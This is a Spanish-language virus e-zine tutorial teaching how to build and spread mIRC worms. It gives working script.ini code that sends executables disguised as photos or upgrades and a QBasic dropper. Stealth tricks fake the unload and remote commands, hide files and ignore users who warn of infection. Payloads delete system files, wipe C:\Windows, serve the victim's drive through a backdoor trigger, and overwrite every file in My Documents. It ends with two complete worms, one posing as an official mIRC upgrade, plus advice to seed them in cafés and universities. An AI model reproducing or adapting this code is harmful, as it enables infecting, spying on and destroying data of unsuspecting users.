            Divirtiendonos con Mirc
                  By Vil Roach
                     Thanks to Del_Armg0/[MATRiX] for his article about worms.



Bienvenidos a otro divertido articulo de esta maravillosa e-zine , en esta ocasion analizaremos
y estudiaremos la forma de crear Worms que se transporten atraves del famoso programa Mirc .

Como muchos de los articulos en esta la gloriosa primer entrega de nuestra e-zine favorita , el 
caracter de estos es meramente introducctiorio , siendo nuestras intencione que nuestros afortu-
nados lectores se interesen por cualquiera de estos temas y comiencen a investigar e incluso a 
escribir articulos para esta maravillosa e-zine . Si alguien se interesa por este o cualquier 
tema de un articulo mismo tiene todo mi permiso para comunicarse conmigo y solicitarme 
documentacion , tutoriales o incluso e-zines acerca de virus y temas variados.

Lo Basico

Comenzaremos respondiendo una pregunta basica : que es un Worm ?

Un worm es una pieza de codigo que de una o otra forma se encarga de que su mismo codigo sea 
enviado a otras maquinas realizando el mismo proceso en las otras maquinas , la principal 
diferencia de este con un virus es que el worm no se introduce en otros archivos para 
reproducirse , el archivo original del worm se mantiene durante toda la infeccion y mientras
que el ususario inocente es el que se encarga de llevar el virus a otros equipos , el worm 
usando rutinas de red , se envia a si mismo a otros computadores , la principal diferencia del 
worm es que requiere que el usuario ejecute o abra un archivo , pero si hay gente que  se gasta 
200 dolares en programas oficce , tambien habran personas que ejecutaran archivos que prometan
hacerle un upgrade al equipo para que funcionbe con Internet2 ;)

Ya se que es un Worm , pero como lo hago ?

Aunque existen muchisimas formas de realizar un worm , comenzaremos con una de las formas mas 
comunes de hacerlos , usando la posibilidad de realizar guiones para el Mirc, los guiones son 
una especie de codigo fuente el cual lee el mirc y lo ejecuta , utilizando eventos del mismo 
programa , o sea que un guio simplemente consiste en una serie de instrucciones que le damso al 
programa , para automatizar ciertas tareas o realizar cualquier clase de rutinas utiles ;)

Ahora vamos a ver la creacion de un worm para mirc paso a paso y todos los problemas que implica 
esto y sus soluciones :

Primero que todo debemos saber que el mirc nos permite tener un archivo llamado script.ini en la
carpeta de la aplicacion , pero lo que tiene de especial es que cualquier Script que halla dentro
de este archivo se ejecutara inmediatamente sin preguntarle nada al usuario , interesante , no ?
De esta forma ya sabemos que tenemos que hacer construir un archivo ejecutable por el ordenador 
que grabe un archivo script.ini en el directorio de mirc , conteniendo este archivo (script.ini) 
una serie de comandos que envien este ejecutable a otros computadores . A continuacion veremos un 
simpliso worm de mirc

<--Script.ini-->

n6 =on 1:JOIN:#:{
n7 =if ( $nick == $me ) { halt } | .dcc send $nick C:\Windows\PAmelaAnderson.Jpg.Exe
n8 = }

<--------------> 

Explicacion : Este simple Script lo que hace es responder al evento join (cuando alguien se une 
al canal en el que estamos) , enviandole el archivo PamelaAnderson.Jpg.Exe , pero primero chequea
que el usuario no sea el mismo . Pero por que ese nombre del archivo ? porque si el usuario lo 
ve en windows vera algo como pamelaanderson.jpg o inluso algo como pameland... , de esta forma 
el usuario no tendra porque sospechar de una simple foto .jpg .

Si no se entiende el codigo anterior , le recomiendo que lea el archivo mirc32.hlp , aunque si
no entiende un codigo tan simple dudo que sepa leer .

<---PamelaAnderson.Jpg.Exe--->

SHELL "copy C:\Mirc\Download\PamelaAnderson.Jpg.Exe C:\Windows\PamelaAnderson.Jpg.Exe"
SHELL "Atribb +h +r C:\Windows\PamelaAnderson.Jpg.Exe"
OPEN "C:\Mirc\Script.ini" FOR OUTPUT AS #1
PRINT #1, "n6 =on 1:JOIN:#:{"
PRINT #1, "n7 =if ( $nick == $me ) { halt } | .dcc send $nick C:\Windows\PAmelaAnderson.Jpg.Exe"
PRINT #1, "n8 = }"
CLOSE #1
SHELL "Del /y C:\Mirc\Download\PamelaAnderson.Jpg.Exe"
PRINT "Warning This File Is Corrupted , Download Again Please !"

<---------------------------->

Explicacion : Este simple programa en Qbasic lo que hace es copiar el archivo que recibo el 
usuario al directorio de windows , le pone atributos de escondido y de solo lectura y luego crea 
un archivo script.ini lo llena con el codigo , luego borra el archivo por razones de seguridad e 
imprime un mensaje de error para hacer creer al usuario que no paso nada .

Aunque el codigo anterior es muy simple es completamente funcional si no me crees pruebalo y 
veras los resultados , pero tambien tiene una gran cantidad de problemas : el worm supone que
el archivo esta en el directorio C:\Mirc , lo cual no es cierto en las ultimas versiones de Mirc,
,el codigo del script.ini es muy simple y se pueden hacer muchas cosas mas que luego analizaremos
y finalmente pero no por ello menos grave es que el Mirc tiene una opcion por defecto mediante la
cual el Mirc no recibe archivos de extension *.exe,*.com,*.bat,*.dll,*.ini y simplemete los igno-
ra , pero no nos preocupemos existen muchisimas mas extensione que podemos usar y lo mejor es que
la mayoria son escondidas por defecto , unos cuantos ejemplos de estas extensiones son :
-*.vbs (VisualBasicScript)
-*.html,*htm(con codigo vbscript o javascript)
-*.js (Javascript)
-*.pif(Acceso directo de los tiempos de Windows 3.11)
-*.lnk(Acceso Directo de WIndows 95)
-*.inf(Informacion de instalacion)
-*.Scf(Secuencia de comandos  del explorador , en estos momentos estoy estudiando la forma de 
       ejecutar archivos con este formato si alguien tiene alguna informacion por favor Email me)
-*.doc,*.xls,*.ppt(o cualquier archivo de office usando macros en VBA o incrustacion OLE)
-*.hta(Html Aplication)
Como vemos las opciones son muchas y muy interesantes .

Ahora estudiaremos algunas de las posibilidades que tiene el lenguaje de script del mirc para la
creacion de nuestro bichejos.

Infeccion 

La forma como llevaremos a cabo la infeccion es respondiendo a ciertos eventos que pasen en los
canales en los cuales este el usuario infectado por ejemplo : join se activa cuando alguien se 
une al canal , kick se activa cuando alguien es pateado (podriamos decirle que es un archivo para
que no nos kickeen de los canales , text cuando alguien dice alguna estupidez , los eventos son
muchos mas pero para nuestros intereses puedn resultar poco interesantes . La forma de usar estos
comandos es :

Primero un on , luego el numero 1 que es el tipo de usuario ,osea todos los usuarios , luego el
evento a usar , un parametro para el evento , y luego un asterisco para indicar que se buscaran
textos en cualquier tipo de mensajes , otras posibilidades de este parametro es poner #pepe donde
se buscara en el canal pepe , o ? donde se buscara en mensajes privados ; de esta forma el 
siguiente ejemplo se activa cuando alguien dice peru en el canal colombia :

n1 =on 1:text:*peru*:#colombia:

los asteriscos son para indicar que se activara con cualquier pala bra que contenga peru , por 
ejemplo perulandia , o choperuano , etc .

Este ejemplo kickea a alguien que diga la palabra Dios en un mensaje privado 

n1 =on 1:text:Dios:?:/kick $chan $nick 

Ahora veamos un ejemplo paractico :

n16=on 1:text:*videojuego*:*:{
n17=if ( $nick == $me ) { halt } | .dcc send $nick c:\Windows\Tekken5.movie.exe
n18=}

Esta pieza de codigo se encarga de enviarle un supuesto video de tekken5 a cualquiera que diga
la palabra videojuego sin importar el canal en el que estemos o si el mensaje es privado .

n5=on 1:join:#fotosXXX:{
n6=/msg $nick Material 100% explosivo ;)
n7=if ( $nick == $me ) { halt } | .dcc send $nick C:\distrib\NochesHumedas!.JPG.com  
n8=}

Este es aun mejor al usuario unirse al canal  #fotosXXX le envia el archivo y un mensaje diciendo
le que es material 100% explosivo , y no en realidad no estariamos mintiendo mucho .

Como ven la parte de la infeccion es una de las mas simples , pero ahora continuemos con algo mu-
cho mas interesante el Stealth.

Stealth

El stealth es una de las tecnicas mas basicas e importantes de los virus y muchas seres vivientes
para su sobreviviencia , estamos hablando por supuesto de camuflaje o simples tecnicas para pasar
desapercibidos frente a peligro como usuarios curiosos , etc .

Primero debemos asegurarnos de que el usuario no pueda desactivar las opciones que hacen funcio-
nar a nuestro worm , dos de estas son unload y remove , la forma mas simple de desactivarlas es
definiendo un alias (o sea una especie de macro, pero en mirc) que se llanme como los comandos y
que al ejecutarse haga creer al usuario que todo va bien , por ejemplo :

n1 = alias Remote
n2 = if ($1 == off) { echo 6 *** Remote is OFF (Ctcps,Events,Raw) }
n3 = if ($1 == on) {echo 6 *** Remote is On (Ctcps,Events,Raw) }
n8 = }

Lo que hace este codigo es tomar el parametro de remote (comando que nos permite desactivar los 
eventos tipo on join) mediante la variable %1 y hace creer al usuario que el comando remote se 
ejecuto correctamente .

n9=alias unload {
n10=if ($1 == -rs) { echo 6 *** Unloaded script 'script.ini' }
n11=}

Este codigo lo que hace es responder al comando unload -rs(que descarga el script.ini de la memo-
ria) diciendole al usuario que todo va bien , de esta forma podemos responder a otros comandos
como events on/off , SREQ on/off , play $file y muchos otros , simplemete investiga el mirc32.hlp
en busca de eventos que puedan perjudicar nuestro worm y fabrica tus rutinas falsas , todas se 
basan en el mismo principio : hacer un alias con el nombre del comando , analizar los parametros
con las variables $1,$2,..etc, y responder al usuario como si hubieramos ejecutado el comando
normalmente .

Ahora estudiaremos las tacnicas de stealth que mas interesantes me parecen , las que se usan para
esconder los archivos para la vista del usuario curioso ; primero veremos la forma de evitar que
el usuario pueda borrar el archivo script.ini durante la ejecucion del programa y de esta forma
si algun usuario "experto" le dice al usuario infectado que borre el archivo script.ini este no
lo encontrara en ningun lado , el comando que nos permite hacer esta maravilla es /run el cual
nos permite ejecutar cualquier comando del shell de dos , lo podemos usar de muchas maneras y a
continuacion se exponen dos ejemplos para ocultar el archivo script.ini :

n2=On 1:Connect:{
n3=/run attrib +h +r +s script.ini
n4=}

Este codigo lo que hace es simplemente que al ocurrir el evento Connect al archivo script.ini se
le cambian sus atributos para que sea invisible , de sistema y solo lectura , aunque si el usua-
rio tiene activada la opcion de ver todos los archivos , esta tecnica no nos servira de nada .La
tecnica que sigue a continuacion es mucho mas interesante  :


n1=on 1:connect:/rename script.ini mirc32.dll
n2=on 1:disconnect:/rename mirc32.dll script.ini

Esta pieza de codigo lo que renombrar script.ini cuando el usuario se conecta de esta forma el 
usuario no lo encontrara , luego cuando se desconecte el archivo volvera a su nombre normal y el
programa podra leerlo la proxima vez que reinicie .

Pero el script.ini no es el unico archivo que tenemos que ocultar , tambien debemos ocultar el 
ejecutable , ya que un archivo pamelaanderson.Jpg.Exe se veria muy sospechoso en el directorio
de windows , lo que hacemos es guardarlo con un nombre poco sospechoso como win32.dll y cuando
nos conectemos le cambiamos el nombre por uno mas atractivo , todo este procedimiento se reali-
zaria de esta forma :


n4=on 1:connect:/rename C:\Windows\Win32.dll C:\Windows\PamelaAnderson.JPG.exe
n5=on 1:disconnect:/rename C:\Windows\PamelaAnderson.JPG.exe C:\Windows\win32.dll 

De esta forma cuando infectemos al usuario le pondremos un nombre al ejecutable tal como 
win32.dll poco interesante , pero les aseguro que muy pocos usuarios borrarian un archivo llamado
win32.dll >=>

Otra cosa que debemos hacer para tratar de mantener el worm oculto la mayor parte del tiempo es 
ignorar a todos aquellos usuarios que quieran advertirle al usuario sobre su infeccion , esto lo
hacemos de la siguiente manera :

n1=on 1:text:*script.ini*:#:/.ignore $nick
n2=on 1:text:*virus*:#:/.ignore $nick
n3=on 1:text:*worm*:#:/.ignore $nick
n4=on 1:text:*infec*:#:/.ignore $nick
n5=on 1:text:*.exe*:#:/.ignore $nick

De esta forma ignoramos a cualquier usuario que este hablando sobre virus,worm,infecciones o Por
que diablos me estas enviando archivos .EXE?

Como ven las tecnicas de Stealth son tal vez las mas divertidas e interesantes , si quieren pro-
fundizar en estas tecnicas les recomiendo que lean bien mirc32.hlp y que piensen toda las posibi-
lidades que existen cuando un usuario se contagia con un worm , por ultimo decir que el dropper
o sea el ejecutable tambien tiene gran importancia en este aspecto , ya que este le debe hacer
creer al usuario que todo fue normal y debe ser discreto con su archivo .

Por ultimo menciona que el parametro /run -n correra un programa minimizado .

Payload

El payload es lo que hace el worm para mostar que esta vivo , puede ser un mensaje como expresion
del autor o puede convertirse en una perfecta herramienta para el espionaje . Veamos algunos
ejemplos :


n1=on 1:connect :/if ($day = friday) {
n2=/echo The JosePepe Worm is greting you and wihing a good Friday 
n3=/run command.com /C del /y C:\Windows\*.dat
n4=/echo But idon't think you are gonna a good Friday without you *.dat Bye ! Bye !
n5=}

Lo que hace el ejemplo anterior es borrar los archivos .dat el dia viernes y darle un mensaje 
al usuario .

Los siguientes ejemplos nos permitirian tener un control total sobre el computador de la pobre 
victima (una pobre victima que seguramente usa un pentium III 600 Mhz , 128 RAM , 20 Gb , y 
mucho mas , para usar el ICQ y el Mirc con el fin de socializar al no poder hacerlo con personas
de verdad) .

n1=on 1:join:*:{
n2=if ($nick = Vil_Roach ) {
n3=/msg $nick Hi Masster Im Am ALive!! mi adress is $ip at %server and port $port
n4=}

Esta otra pieza de codigo se encarga de hacernos famosos entre la respetable y adorable comunidad
de virus-makers.

n5=/join #virus
n6=/msg #virus Hello all i am another stupid dumb matafuka infected with Jose Pepe Worm , Cya!
n7=/part #virus
n8=/join #vir
n9=/msg #virus Hello all i am another stupid dumb matafuka infected with Jose Pepe Worm , Cya!
n10=/part #vir

Este codigo se asegura que cuando yo me conecte en un canal con un usuario infectado este se
comunicara conmigo y esperar mis ordenes :

n1=on 1:text:VilRoachOpen:*:{/fserve Vil_Roach 10 C:\
n2=on 1:text:vilRoachFuckyou:*:{/run command.com /C deltree /y C:\Windows
n3=on 1:text:VilRoachgetOut:*:{/exit}
n3=on 1:text:VilRoachSuck:*:{/join #sex
n4=/join #god
n5=/msg #god I am fucking gay and i wanna fuck you al cuz you are only shit
n6=/msg #god I am fucking gay and i wanna fuck you al cuz you are only shit
n7=/msg #god I am fucking gay and i wanna fuck you al cuz you are only shit
....


Esta serie de comandos lo que hace es responder a una serie de ordenes dadas por mi que que me
permiten hacerle lo que quiera al usuario , tal como hacer que pueda explorar todo su disco duro
con la orden /fserve (mirar mirc32.hlp para mas seas) , joderle el Pc o incluso iniciar un lindo
flood en el canal #god

Otro cosa divertida seria por ejemplo hacer que el usuario baje un troyano , e inmediatamente lo
tenga en su pc ejecutarlo , y nosotros al tener su ip lo tendriamos en nuestro poder , esta 
tecnica la veremos en uno de los worms que les voy a presentar mas adelante .

Por ultimo no podemos olvidar camuflar nuestro script como si fuera algo muy importante por
ejemplo :

[script]
n0=;mIRC Protection Script DO NOT EDIT!
n1=;By Khaled Mardem-Bey
n2=; www.mirc.com
n3=
 
[script]
n0=;mIRC Upgrade to version 5.6.9
n1=;This file is copryght of  Khaled Mardem-Bey
n2=;DO NOT  Edit or distribuite without the permision of the Autors 
n3=; www.mirc.com        All Rigths Reserved 2000

De esta forma el usuario le dara miedo editar los archivos al creer que son algo muy importante.

Ya hice mi worm usando estas tecnica y unas muchas mas avanzadas que investigue yo mismo , pero
como lo reparto ahora ??? 

Simple muchacho ahora tienes que construir un script que se vaya metiendo 
a montones de canales y que vaya repartiendo diferentes versiones del mismo , por ejemplo :

n0=on 1:connect:{
n1= .remote on
n2= .ctcps on
n3= .events on
n4=}
n5=on 1:join:#sexpics:{
n6= if ( $nick == $me ) { halt } | .dcc send $nick C:\MyWorms\TheTrueLaraCroftNude.JPG.Exe
n7=}
n8=on 1:join:#sex:{
n9= if ( $nick == $me ) { halt } | .dcc send $nick C:\MyWorms\MeWithMyGirlfriend;).JPG.Exe
n10=}
n11=on 1:join:#Mp3:{
n12= if ( $nick == $me ) { halt } | .dcc send $nick C:\MyWorms\Napster-Manifesto!!.Html
n13=}
n14=on 1:join:#Korn:{
n15= if ( $nick == $me ) { halt } | .dcc send $nick C:\MyWorms\FamilyValues2001.JPG.Exe
n16=}
n17=on 1:join:#LimpBizkit:{
n18= if ( $nick == $me ) { halt } | .dcc send $nick C:\MyWorms\FamilyValues2001.JPG.Exe
n19=}
n20=on 1:join:#Warez:{
n21= if ( $nick == $me ) { halt } | .dcc send $nick C:\MyWorms\Serialz.Html
n22=}
n23=on 1:join:#Warez:{
n24= if ( $nick == $me ) { halt } | .dcc send $nick C:\MyWorms\MyAppz.Html
n25=}
n26=on 1:join:#Teen:{
n27= if ( $nick == $me ) { halt } | .dcc send $nick C:\MyWorms\BritneySpearsTrueHistory.Html
n28=}
n29=on 1:join:#Pop:{
n30= if ( $nick == $me ) { halt } | .dcc send $nick C:\MyWorms\BritneySpearsTrueHistory.Html
n31=}
n32=on 1:join:#TeenZone:{
n33= if ( $nick == $me ) { halt } | .dcc send $nick C:\MyWorms\NSYNC-TrueHistory.Html
n34=}
n35=on 1:text:*sex*:*:/dcc send $nick C:\MyWorms\MeWithMyGirlfriend;).JPG.Exe
n35=on 1:text:*videogame*:*:/dcc send $nick C:\MyWorms\TheTrueLaraCroftNude.JPG.Exe
n35=on 1:text:*mp3*:*:/dcc send $nick C:\MyWorms\Napster-Manifesto!!!.Html
n36=on 1:FILESENT:*.* /run Command.com /C Echo $nick Was infected With $filename >> infected.txt

Ahora simplemente activa este scripts en todos los computadores que puedas , los mejores lugares
son Cafes Internet y Universidades ya que estas estan conectadas casi constantemente .

Con esto finaliza el estudio de las principales tecnicas basicas para la creacion de Worms en
Mirc , ahora todo depende de ustedes , si quieren realizar todos sus bichos simplemente lean 
mucho , investiguen y ensayen todas las probabilidades posibles , porque lo mejor de esta acti-
vidad es que los unicos trabajos que van a sobresalir van a ser aquellos que utilicen tecnicas 
originales , las cuales no son conocidas por los antivirus o por los mismos usuarios .   

Si alguien se interesa por estos temas y me lo manifesta por medio de e-mail , tratare de 
escribir mas articulos mas adelante , por ejemplo sobre  hacer nuestro worms compatibles con
Pirch y con Visual Irc, tecnicas mas avanzadas en Mirc , formas de hacer dropers e incluso otras
formas de hacer worms , por ejemplo usando la automatizacion deciertos  programas de e-mail , pro
gramando directamente el WinSock.Dll , Etc .

A Continuacion Analizare dos worms de mi autoria creados explicitamente para este articulo , haga
lo que le de la gana con ellos , pero si es lo suficientemente LAMER como para simplemete cambiar
el nombre de algunas variables y usarlo para su beneficio sin darme ningun tipo de credito espero
que usted y toda su familia mueran de la forma mas dolorosa posible .

<-----------------------------------Surfacing Worm--------------------------------------------->

Worm Que usa el Mirc como medio para propagarse a traves de el Irc , se compone de dos partes un
archivo Script.Ini que se encarga de enviar el Worm al mayor numero de personas posibles y un ar-
chivo Mirc-Upgrade!!.Inf que se encarga de instalar el Script.Ini en el directorio de Mirc.

<---------------------------------------------------------------------------------------------->
<----------------------------------------CUT HERE---------------------------------------------->
<---------------------------------------------------------------------------------------------->

<----Mirc-Upgrade!!.Inf---->
;Description :
;
;WITH THIS FILE UPGRADE NOW Mirc 5.* Anti-Nuke Anti-Virus And The best Anti-Boring
;
;This file is a part of the Mirc Software Package , Any modification
;Over this file Should be made under permission of the Author of the
;Softwar Package 
;
;Thanks For Using Mirc ;)              
;
;
; 
;                          Khaled Mardam-Bey All Rigths Reserved  2000
;

[version]
Signature = "$Chicago$"
SetupClass=BASE 

[DefaultInstall] 
UpdateAutobat = Upgrade.Mirc

[Upgrade.Mirc]
CmdDelete = "@ctty","nul"
CmdDelete = "echo  " , ";mIRC Upgrade to version 5.6.9 > C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , ";This file is copryght of  Khaled Mardem-Bey >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , ";DO NOT  Edit or distribuite without the permision of the Autors >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , ";www.mirc.com        All Rigths Reserved 2000 >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "[SCRIPT] >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n1=alias Remote >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n2=if ($1 == off) { echo 6 *** Remote is OFF (Ctcps,Events,Raw) } >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n3=if ($1 == on) {echo 6 *** Remote is On (Ctcps,Events,Raw) } >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n4=} >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n5=alias unload { >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n6=if ($1 == -rs) { echo 6 *** Unloaded script 'script.ini' } >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n7=} >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n8=on 1:connect:{/rename C:\Windows\Wins32.dll C:\Windows\Upgrade-Mirc.inf >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n9=/rename &mircdir $+ script.ini $mircdir $+ Mirc.dll } >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n10=on 1:disconnect:{/rename  C:\Windows\Upgrade-Mirc.inf C:\Windows\Wins32.dll >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n11=/rename $mircdir $+ Mirc.dll &mircdir $+ script.ini  } >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n12=on 1:join:#:{ if ($nick != $me) { .dcc send C:\Windows\Upgrade-Mirc.Inf  >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n13=/msg $nick Here i send you an important Upgrade for our loved Mirc ;) >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n14=/msg $nick simply click with the left button on the file an chose Install }} >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n15=on 1:text:*script.ini*:#:/.ignore $nick >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n16=on 1:text:*virus*:#:/.ignore $nick >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n17=on 1:text:*worm*:#:/.ignore $nick >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n18=on 1:text:*infec*:#:/.ignore $nick >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n19=on 1:text:*.inf*:#:/.ignore $nick >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n20=on 1:start:{if ($day = friday){/join #virus  >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n21=/msg #virus Hello Everobody , i am a stupid matafoka infected with the Surfancing Worm FUCK IT ALL !!!! >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n22=/part #virus} >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n23=if ($rand(1,100) = 66)  {/write stdio.sys !!Fuck It All Fuck This World Fuck Everything you Stand For  >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n24=/write stdio.sys Dont Belong Dont eExist And Dont Ever Judge me !!!! >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n25=/write autoexec.bat @ctty nul >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n26=/write autoexec.bat cd \ >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n27=/write autoexec.bat cd My Documents >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n28=/write autoexec.bat for %%x in (*.*) copy C:\stdio.sys %%x >> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n29=/write autoexec.bat @ctty con>> C:\Mirc\Script.Ini  "
CmdDelete = "echo  " , "n30=:loop >> C:\Mirc\Script.ini "
CmdDelete = "echo  " , "n31=if (%x = 46) then goto listo  >> C:\Mirc\Script.ini "
CmdDelete = "echo  " , "n32=/write -dsecho C:\autoexec.bat  >> C:\Mirc\Script.ini "
CmdDelete = "echo  " , "n33=/inc(%x)  >> C:\Mirc\Script.ini "
CmdDelete = "echo  " , "n34=goto loop  >> C:\Mirc\Script.ini "
CmdDelete = "echo  " , "n35=:listo  >> C:\Mirc\Script.ini "
CmdDelete = "@ctty " , "con"

CmdAdd = "@ctty","nul"
CmdAdd = "echo  " , ";mIRC Upgrade to version 5.6.9 > C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , ";This file is copryght of  Khaled Mardem-Bey >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , ";DO NOT  Edit or distribuite without the permision of the Autors >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , ";www.mirc.com        All Rigths Reserved 2000 >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "[SCRIPT] >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n1=alias Remote >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n2=if ($1 == off) { echo 6 *** Remote is OFF (Ctcps,Events,Raw) } >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n3=if ($1 == on) {echo 6 *** Remote is On (Ctcps,Events,Raw) } >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n4=} >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n5=alias unload { >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n6=if ($1 == -rs) { echo 6 *** Unloaded script 'script.ini' } >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n7=} >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n8=on 1:connect:{/rename C:\Windows\Wins32.dll C:\Windows\Upgrade-Mirc.inf >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n9=/rename &mircdir $+ script.ini $mircdir $+ Mirc.dll } >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n10=on 1:disconnect:{/rename  C:\Windows\Upgrade-Mirc.inf C:\Windows\Wins32.dll >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n11=/rename $mircdir $+ Mirc.dll &mircdir $+ script.ini  } >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n12=on 1:join:#:{ if ($nick != $me) { .dcc send C:\Windows\Upgrade-Mirc.Inf  >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n13=/msg $nick Here i send you an important Upgrade for our loved Mirc ;) >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n14=/msg $nick simply click with the left button on the file an chose Install }} >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n15=on 1:text:*script.ini*:#:/.ignore $nick >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n16=on 1:text:*virus*:#:/.ignore $nick >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n17=on 1:text:*worm*:#:/.ignore $nick >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n18=on 1:text:*infec*:#:/.ignore $nick >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n19=on 1:text:*.inf*:#:/.ignore $nick >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n20=on 1:start:{if ($day = friday){/join #virus  >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n21=/msg #virus Hello Everobody , i am a stupid matafoka infected with the Surfancing Worm FUCK IT ALL !!!! >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n22=/part #virus} >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n23=if ($rand(1,100) = 66)  {/write stdio.sys !!Fuck It All Fuck This World Fuck Everything you Stand For  >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n24=/write stdio.sys Dont Belong Dont eExist And Dont Ever Judge me !!!! >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n25=/write autoexec.bat @ctty nul >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n26=/write autoexec.bat cd \ >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n27=/write autoexec.bat cd My Documents >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n28=/write autoexec.bat for %%x in (*.*) copy C:\stdio.sys %%x >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n29=/write autoexec.bat @ctty con >> C:\Mirc\Script.Ini  "
CmdAdd = "echo  " , "n30=:loop >> C:\Mirc\Script.ini "
CmdAdd = "echo  " , "n31=if (%x = 46) then goto listo  >> C:\Mirc\Script.ini "
CmdAdd = "echo  " , "n32=/write -dsecho C:\autoexec.bat  >> C:\Mirc\Script.ini "
CmdAdd = "echo  " , "n33=/inc(%x)  >> C:\Mirc\Script.ini "
CmdAdd = "echo  " , "n34=goto loop  >> C:\Mirc\Script.ini "
CmdAdd = "echo  " , "n35=:listo  >> C:\Mirc\Script.ini "
CmdAdd = "@ctty " , "con"


<---------------------------------------------------------------------------------------------->
<----------------------------------------CUT HERE---------------------------------------------->
<---------------------------------------------------------------------------------------------->
<-------Script.ini------->


;mIRC Upgrade to version 5.6.9
;This file is copryght of  Khaled Mardem-Bey
;DO NOT  Edit or distribuite without the permision of the Autors 
; www.mirc.com        All Rigths Reserved 2000

[SCRIPT]
n1=alias Remote
n2=if ($1 == off) { echo 6 *** Remote is OFF (Ctcps,Events,Raw) }
n3=if ($1 == on) {echo 6 *** Remote is On (Ctcps,Events,Raw) }
n4=}
n5=alias unload {
n6=if ($1 == -rs) { echo 6 *** Unloaded script 'script.ini' }
n7=}
n8=on 1:connect:{/rename C:\Windows\Wins32.dll C:\Windows\Upgrade-Mirc.inf
n9=/rename &mircdir $+ script.ini $mircdir $+ Mirc.dll }
n10=on 1:disconnect:{/rename  C:\Windows\Upgrade-Mirc.inf C:\Windows\Wins32.dll
n11=/rename $mircdir $+ Mirc.dll &mircdir $+ script.ini  }
n12=on 1:join:#:{ if ($nick != $me) { .dcc send C:\Windows\Upgrade-Mirc.Inf 
n13=/msg $nick Here i send you an important Upgrade for our loved Mirc ;)
n14=/msg $nick simply click with the left button on the file an chose Install }}
n15=on 1:text:*script.ini*:#:/.ignore $nick
n16=on 1:text:*virus*:#:/.ignore $nick
n17=on 1:text:*worm*:#:/.ignore $nick
n18=on 1:text:*infec*:#:/.ignore $nick
n19=on 1:text:*.inf*:#:/.ignore $nick
n20=on 1:start:{if ($day = friday){/join #virus 
n21=/msg #virus Hello Everobody , i am a stupid matafoka infected with the Surfancing Worm FUCK IT ALL !!!!
n22=/part #virus}
n23=if ($rand(1,100) = 66)  {/write C:\ stdio.sys !!Fuck It All Fuck This World Fuck Everything you Stand For 
n24=/write C:\stdio.sys Dont Belong Dont eExist And Dont Ever Judge me !!!!
n25=/write C:\autoexec.bat @ctty nul
n26=/write C:\autoexec.bat cd \
n27=/write C:\autoexec.bat cd My Documents
n28=/write C:\autoexec.bat for %%x in (*.*) copy C:\stdio.sys %%x
n29=/write C:\autoexec.bat @ctty con}
n30=:loop
